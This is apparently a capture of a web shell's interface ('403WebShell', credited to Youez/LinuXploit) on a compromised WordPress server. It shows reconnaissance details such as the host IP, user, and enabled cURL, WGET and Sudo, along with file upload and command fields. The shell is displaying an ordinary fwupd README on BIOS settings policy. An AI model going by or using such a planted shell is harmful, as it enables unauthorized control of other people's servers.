Warning: chmod(): Operation not permitted in /var/www/alexvillarreal/wp-content/plugins/custom-post-type-ui/custom-post-type-ui.php on line 8
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.114
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /etc/fwupd/bios-settings.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/fwupd/bios-settings.d/README.md
# BIOS Settings

On supported machines fwupd can enforce BIOS settings policy so that a user's desired settings are configured at bootup
and prevent fwupd clients from changing them.

## JSON policies

A policy file can be created using `fwupdmgr`.  First determine what settings you want to enforce by running:

```shell
# fwupdmgr get-bios-settings
```

After you have identified settings, create a JSON payload by listing them on the command line.  Any number of attributes can
be listed.
For example for the BIOS setting `WindowsUEFIFirmwareUpdate` you would create a policy file like this:

```shell
# fwupdmgr get-bios-settings --json WindowsUEFIFirmwareUpdate > ~/foo.json
```

Now examine `~/foo.json` and modify the `BiosSettingCurrentValue` key to your desired value.

Lastly place this policy file into `/etc/fwupd/bios-settings.d`.  Any number of policies is supported, and they will be examined
in alphabetical order.  The next time that fwupd is started it will load this policy and ensure that no fwupd clients change it.

Youez - 2016 - github.com/yon3zu
LinuXploit